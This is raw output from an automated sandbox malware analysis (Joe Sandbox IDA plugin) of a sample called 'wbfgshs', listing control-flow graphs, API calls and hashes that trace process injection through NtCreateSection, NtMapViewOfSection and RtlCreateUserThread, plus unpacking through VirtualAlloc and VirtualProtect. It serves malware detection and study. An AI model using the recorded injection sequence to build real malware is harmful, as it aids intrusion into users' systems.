                                                                                                                            control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 77 40155d-40156c call 4011a4 71->77 74 40155a 72->74 75 4014ed-4014fb 72->75 74->77 80 40149a-4014a8 75->80 81 4014fd-4014ff 75->81 84 40156e-40157f 77->84 85 4014c1-4014c8 80->85 83 401501 81->83 81->84 88 401504-401518 83->88 89 40148f 83->89 86 401581 84->86 87 401584-401589 84->87 90 401469-401485 call 4011a4 85->90 91 4014ca 85->91 86->87 97 4018a6-4018ae 87->97 98 40158f-4015a0 87->98 88->85 92 40151a 88->92 89->80 90->69 91->68 95 401539-401555 92->95 96 40151c-401526 92->96 95->71 97->87 106 4018a4-4018b3 98->106 107 4015a6-4015cf 98->107 110 4018c8 106->110 111 4018b9-4018c4 106->111 107->106 116 4015d5-4015ec NtDuplicateObject 107->116 110->111 112 4018cb-4018ff call 4011a4 110->112 111->112 116->106 118 4015f2-401616 NtCreateSection 116->118 120 401672-401698 NtCreateSection 118->120 121 401618-401639 NtMapViewOfSection 118->121 120->106 122 40169e-4016a2 120->122 121->120 124 40163b-401657 NtMapViewOfSection 121->124 122->106 125 4016a8-4016c9 NtMapViewOfSection 122->125 124->120 127 401659-40166f 124->127 125->106 128 4016cf-4016eb NtMapViewOfSection 125->128 127->120 128->106 130 4016f1 call 4016f6 128->130
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                                            • String ID: 1
                                                                                                                            • API String ID: 1652636561-2212294583
                                                                                                                            • Opcode ID: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                                            • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                                                            • Opcode Fuzzy Hash: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                                            • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 243 4018c8 239->243 244 4018b9-4018c4 239->244 240->239 249 4015d5-4015ec NtDuplicateObject 240->249 243->244 245 4018cb-4018ff call 4011a4 243->245 244->245 249->239 251 4015f2-401616 NtCreateSection 249->251 253 401672-401698 NtCreateSection 251->253 254 401618-401639 NtMapViewOfSection 251->254 253->239 255 40169e-4016a2 253->255 254->253 257 40163b-401657 NtMapViewOfSection 254->257 255->239 258 4016a8-4016c9 NtMapViewOfSection 255->258 257->253 260 401659-40166f 257->260 258->239 261 4016cf-4016eb NtMapViewOfSection 258->261 260->253 261->239 263 4016f1 call 4016f6 261->263
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                            • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                                                            • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                            • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 289 4018c8 285->289 290 4018b9-4018c4 285->290 286->285 295 4015d5-4015ec NtDuplicateObject 286->295 289->290 291 4018cb-4018ff call 4011a4 289->291 290->291 295->285 297 4015f2-401616 NtCreateSection 295->297 299 401672-401698 NtCreateSection 297->299 300 401618-401639 NtMapViewOfSection 297->300 299->285 301 40169e-4016a2 299->301 300->299 303 40163b-401657 NtMapViewOfSection 300->303 301->285 304 4016a8-4016c9 NtMapViewOfSection 301->304 303->299 306 401659-40166f 303->306 304->285 307 4016cf-4016eb NtMapViewOfSection 304->307 306->299 307->285 309 4016f1 call 4016f6 307->309
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                            • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                                                            • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                            • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 337 4018c8 333->337 338 4018b9-4018c4 333->338 334->333 343 4015d5-4015ec NtDuplicateObject 334->343 337->338 339 4018cb-4018ff call 4011a4 337->339 338->339 343->333 345 4015f2-401616 NtCreateSection 343->345 347 401672-401698 NtCreateSection 345->347 348 401618-401639 NtMapViewOfSection 345->348 347->333 349 40169e-4016a2 347->349 348->347 351 40163b-401657 NtMapViewOfSection 348->351 349->333 352 4016a8-4016c9 NtMapViewOfSection 349->352 351->347 354 401659-40166f 351->354 352->333 355 4016cf-4016eb NtMapViewOfSection 352->355 354->347 355->333 357 4016f1 call 4016f6 355->357
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                            • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                                            • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                            • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 380 4018c8 376->380 381 4018b9-4018c4 376->381 377->376 386 4015d5-4015ec NtDuplicateObject 377->386 380->381 382 4018cb-4018ff call 4011a4 380->382 381->382 386->376 388 4015f2-401616 NtCreateSection 386->388 390 401672-401698 NtCreateSection 388->390 391 401618-401639 NtMapViewOfSection 388->391 390->376 392 40169e-4016a2 390->392 391->390 394 40163b-401657 NtMapViewOfSection 391->394 392->376 395 4016a8-4016c9 NtMapViewOfSection 392->395 394->390 397 401659-40166f 394->397 395->376 398 4016cf-4016eb NtMapViewOfSection 395->398 397->390 398->376 400 4016f1 call 4016f6 398->400
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                            • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                                                            • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                            • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 422 4018c8 418->422 423 4018b9-4018c4 418->423 419->418 428 4015d5-4015ec NtDuplicateObject 419->428 422->423 424 4018cb-4018ff call 4011a4 422->424 423->424 428->418 430 4015f2-401616 NtCreateSection 428->430 432 401672-401698 NtCreateSection 430->432 433 401618-401639 NtMapViewOfSection 430->433 432->418 434 40169e-4016a2 432->434 433->432 436 40163b-401657 NtMapViewOfSection 433->436 434->418 437 4016a8-4016c9 NtMapViewOfSection 434->437 436->432 439 401659-40166f 436->439 437->418 440 4016cf-4016eb NtMapViewOfSection 437->440 439->432 440->418 442 4016f1 call 4016f6 440->442
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                            • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                                                            • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                            • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                            • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                                                            • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                            • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 134 7b003c-7b0047 135 7b0049 134->135 136 7b004c-7b0263 call 7b0a3f call 7b0e0f call 7b0d90 VirtualAlloc 134->136 135->136 151 7b028b-7b0292 136->151 152 7b0265-7b0289 call 7b0a69 136->152 154 7b02a1-7b02b0 151->154 156 7b02ce-7b03c2 VirtualProtect call 7b0cce call 7b0ce7 152->156 154->156 157 7b02b2-7b02cc 154->157 163 7b03d1-7b03e0 156->163 157->154 164 7b0439-7b04b8 VirtualFree 163->164 165 7b03e2-7b0437 call 7b0ce7 163->165 166 7b04be-7b04cd 164->166 167 7b05f4-7b05fe 164->167 165->163 169 7b04d3-7b04dd 166->169 170 7b077f-7b0789 167->170 171 7b0604-7b060d 167->171 169->167 174 7b04e3-7b0505 169->174 175 7b078b-7b07a3 170->175 176 7b07a6-7b07b0 170->176 171->170 177 7b0613-7b0637 171->177 185 7b0517-7b0520 174->185 186 7b0507-7b0515 174->186 175->176 178 7b086e-7b08be LoadLibraryA 176->178 179 7b07b6-7b07cb 176->179 180 7b063e-7b0648 177->180 184 7b08c7-7b08f9 178->184 182 7b07d2-7b07d5 179->182 180->170 183 7b064e-7b065a 180->183 187 7b07d7-7b07e0 182->187 188 7b0824-7b0833 182->188 183->170 189 7b0660-7b066a 183->189 190 7b08fb-7b0901 184->190 191 7b0902-7b091d 184->191 192 7b0526-7b0547 185->192 186->192 193 7b07e2 187->193 194 7b07e4-7b0822 187->194 196 7b0839-7b083c 188->196 195 7b067a-7b0689 189->195 190->191 197 7b054d-7b0550 192->197 193->188 194->182 198 7b068f-7b06b2 195->198 199 7b0750-7b077a 195->199 196->178 200 7b083e-7b0847 196->200 202 7b05e0-7b05ef 197->202 203 7b0556-7b056b 197->203 204 7b06ef-7b06fc 198->204 205 7b06b4-7b06ed 198->205 199->180 206 7b084b-7b086c 200->206 207 7b0849 200->207 202->169 210 7b056f-7b057a 203->210 211 7b056d 203->211 208 7b074b 204->208 209 7b06fe-7b0748 204->209 205->204 206->196 207->178 208->195 209->208 214 7b059b-7b05bb 210->214 215 7b057c-7b0599 210->215 211->202 218 7b05bd-7b05db 214->218 215->218 218->197
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 007B024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937393700.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7b0000_wbfgshs.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: 5b83b1d6e075be0e62862089d7e5f4325240138de161d0a465d2f8f56dc3ee68
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: E2527874A00229DFDB64CF68C984BADBBB1BF09304F1480D9E90DAB251DB34AE94DF54

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                                                                                                                            • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937112624.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                            • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                                                                                                                            • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                            • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 464 7f061f-7f0638 465 7f063a-7f063c 464->465 466 7f063e 465->466 467 7f0643-7f064f CreateToolhelp32Snapshot 465->467 466->467 468 7f065f-7f066c Module32First 467->468 469 7f0651-7f0657 467->469 470 7f066e-7f066f call 7f02de 468->470 471 7f0675-7f067d 468->471 469->468 474 7f0659-7f065d 469->474 475 7f0674 470->475 474->465 474->468 475->471
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007F0647
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 007F0667
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937502143.00000000007ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ed000_wbfgshs.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: 74bc7fe53f32c00f09da994bba60d0d3bc27f0ffbb1a9dc6763eb8e08a7f501a
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: 59F096362007186BDB203BF5A88DB7E76E8AF89724F100528E746D27C2DB74EC454AA1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 477 7b0e0f-7b0e24 SetErrorMode * 2 478 7b0e2b-7b0e2c 477->478 479 7b0e26 477->479 479->478
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,007B0223,?,?), ref: 007B0E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,007B0223,?,?), ref: 007B0E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937393700.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7b0000_wbfgshs.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: ffcf5e6dbdd463b1daf0f9ee02433bdb2d1385e856eecc0e7ab2c7339d913e6a
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: 04D0123114512877D7003A94DC09BCE7B1CDF05B62F008411FB0DD9080C774994046E5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                            • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                                                            • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                            • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 537 7f02de-7f0318 call 7f05f1 540 7f031a-7f034d VirtualAlloc call 7f036b 537->540 541 7f0366 537->541 543 7f0352-7f0364 540->543 541->541 543->541
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007F032F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937502143.00000000007ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ed000_wbfgshs.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
